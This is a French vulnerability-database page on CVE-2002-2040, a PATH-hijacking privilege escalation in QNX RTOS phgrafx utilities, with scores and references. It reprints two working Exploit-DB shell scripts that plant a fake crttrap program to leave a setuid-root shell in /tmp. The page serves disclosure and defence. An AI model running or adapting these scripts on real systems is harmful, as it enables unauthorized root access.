CVE-2002-2040 : Détail

CVE-2002-2040

0.05%V3
Local
2005-07-14
04h00 +00:00
2024-09-17
02h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The (1) phrafx and (2) phgrafx-startup programs in QNX realtime operating system (RTOS) 4.25 and 6.1.0 do not properly drop privileges before executing the system command, which allows local users to execute arbitrary commands by modifying the PATH environment variable to reference a malicious crttrap program.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21503

Date de publication : 2002-06-02 22h00 +00:00
Auteur : badc0ded
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/4915/info The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. #!/bin/sh # # click advanced,done, apply, accept and done. # now you should have a setuid root shell waiting in /tmp/badc0ded # # www.badc0ded.com echo "#!/bin/sh" > /tmp/crttrap echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap chmod 755 /tmp/crttrap export PATH="/tmp:$PATH" /usr/photon/bin/phgrafx
Exploit Database EDB-ID : 21504

Date de publication : 2002-06-02 22h00 +00:00
Auteur : badc0ded
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/4916/info The QNX phgrafx-startup utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. #!/bin/sh # # click test,restore,continue # now you should have a setuid root shell waiting in /tmp/badc0ded # # www.badc0ded.com echo "#!/bin/sh" > /tmp/crttrap echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap chmod 755 /tmp/crttrap export PATH="/tmp:$PATH" /usr/photon/bin/phgrafx-startup

Products Mentioned

Configuraton 0

Qnx>>Rtos >> Version 4.25

    Qnx>>Rtos >> Version 6.1.0

      Références

      http://www.securityfocus.com/bid/4916
      Tags : vdb-entry, x_refsource_BID
      http://www.securityfocus.com/bid/4915
      Tags : vdb-entry, x_refsource_BID
      http://online.securityfocus.com/archive/1/275218
      Tags : mailing-list, x_refsource_BUGTRAQ